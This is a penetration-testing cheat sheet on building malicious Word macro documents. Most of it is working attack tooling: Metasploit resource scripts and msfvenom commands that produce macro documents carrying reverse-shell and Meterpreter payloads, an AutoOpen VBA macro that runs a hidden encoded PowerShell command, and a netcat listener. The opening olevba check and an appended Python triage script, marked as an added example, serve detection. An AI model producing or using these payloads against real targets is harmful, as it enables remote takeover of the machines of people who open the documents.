Macros can be used for client-side attacks (malicious document). They are written in Visual Basic for Applications (VBA).
Check macro in file
Install oletools (olevba)
sudo -H pip install -U oletools
Check macro in file
olevba -c <filename.doc>
Create a macro
Save the document as .docm or .doc (Word 97-2003). Do NOT use .docx, as it does not support embedded macros.
Microsoft Word
- Open Microsoft Office Word or Excel
- Create a blank document
- Click on the View tab
- Click on Macros
- Enter macro name Test
- Select Macros in: Document1 (or your document name)
- Click on Create
LibreOffice
Does not work 🙁 More investigation is required…
- Open LibreOffice and create a new document (Writer Document).
- Click on menu Tools->Macros->Organize macros
- Click on the current document.
- Click New.
- Enter name Test
- Save the file (use “Word 97-2003” for .doc extension).
Generate macro – Metasploit
Parameter “DisablePayloadHandler” does not work for this module. Setting it to “False” will NOT create a listener.
msf-generate-word-macro.rc – Meterpreter payload
setg LHOST tun0
setg LPORT 80
setg PAYLOAD windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set FILENAME macro.docm
run
use exploit/multi/handler
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j
msf-generate-word-macro.rc – Non-Meterpreter payload
setg LHOST tun0
setg LPORT 80
setg PAYLOAD windows/shell_reverse_tcp
use exploit/multi/fileformat/office_word_macro
set FILENAME macro.docm
run
use exploit/multi/handler
set ExitOnSession false
exploit -j
Execute
sudo msfconsole -q -r msf-generate-word-macro.rc
Generate macro – Manually
Use Msfvenom to generate a reverse shell payload. See also Powershell Cheat Sheet.
Payload must be split into 255-character chunks as VBA has a limitation on string length.
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f psh | iconv -t UTF-16LE | base64 -w 255 > windows_shell_b64.txt
for line in $(cat windows_shell_b64.txt); do echo "strFunnyStuff = strFunnyStuff + \"$line\""; done;
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f psh | iconv -t UTF-16LE | base64 -w 0 > windows_shell_b64.txt
str=`cat windows_shell_b64.txt`;for (( i=0; i<=${#str}; i+=255 )); do echo "strFunnyStuff = strFunnyStuff + \"${str:$i:255}\""; done
Sub Document_Open()
    Test
End Sub
Sub AutoOpen()
    Test
End Sub
Sub Test()
    Dim strFunnyStuff As String
    ' Split string into 255-char chunks as VBA has a limitation on string length
    'strFunnyStuff = "cmd"
    strFunnyStuff = "powershell.exe -nop -w hidden -e "
    strFunnyStuff = strFunnyStuff + "<base64 payload>"
    CreateObject("Wscript.Shell").Run strFunnyStuff
End Sub
Start a listener on Kali
nc -lnvp 4444
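To triage a suspect document for the macro layout shown above, this added example (not part of the original page) takes the VBA source printed by olevba -c, flags the AutoOpen/Document_Open entry points, replays the chunked string concatenation and decodes the -e argument. The sample macro and its harmless encoded command are constructed, and triage_macro and rebuild_string are hypothetical names.

```python
import base64
import re

# Constructed sample of `olevba -c` output; the encoded command is a harmless placeholder.
_B64 = base64.b64encode("Write-Output 'macro-test'".encode("utf-16-le")).decode()
SAMPLE_VBA = f'''Sub AutoOpen()
Test
End Sub
Sub Test()
Dim strFunnyStuff As String
'strFunnyStuff = "cmd"
strFunnyStuff = "powershell.exe -nop -w hidden -e "
strFunnyStuff = strFunnyStuff + "{_B64[:20]}"
strFunnyStuff = strFunnyStuff + "{_B64[20:]}"
CreateObject("Wscript.Shell").Run strFunnyStuff
End Sub
'''

AUTO_EXEC = re.compile(r'^\s*Sub\s+(AutoOpen|Document_Open)\b', re.I | re.M)
SHELL_RUN = re.compile(r'CreateObject\("Wscript\.Shell"\)\.Run\s+(\w+)', re.I)
ENCODED = re.compile(r'powershell(?:\.exe)?\b.*?\s-e\w*\s+([A-Za-z0-9+/=]+)', re.I)

def rebuild_string(vba, var):
    """Replay `var = "..."` and `var = var + "..."` lines; commented-out lines never match."""
    value = ""
    pat = re.compile(rf'^\s*{re.escape(var)}\s*=\s*(?:({re.escape(var)})\s*[+&]\s*)?"(.*)"\s*$', re.I)
    for line in vba.splitlines():
        m = pat.match(line)
        if m:  # group(1) set means "append", otherwise a fresh assignment
            value = (value if m.group(1) else "") + m.group(2).replace('""', '"')
    return value

def triage_macro(vba):
    """Report auto-run entry points, the command given to Wscript.Shell, and its decoded -e argument."""
    report = {"auto_exec": sorted({name.lower() for name in AUTO_EXEC.findall(vba)}),
              "command": None, "decoded": None}
    run = SHELL_RUN.search(vba)
    if run:
        report["command"] = rebuild_string(vba, run.group(1))
        enc = ENCODED.search(report["command"])
        if enc:
            try:  # PowerShell -e expects base64 over UTF-16LE text
                report["decoded"] = base64.b64decode(enc.group(1), validate=True).decode("utf-16-le")
            except ValueError:
                pass  # not valid base64 or not UTF-16LE: leave undecoded
    return report

if __name__ == "__main__":
    print(triage_macro(SAMPLE_VBA))
```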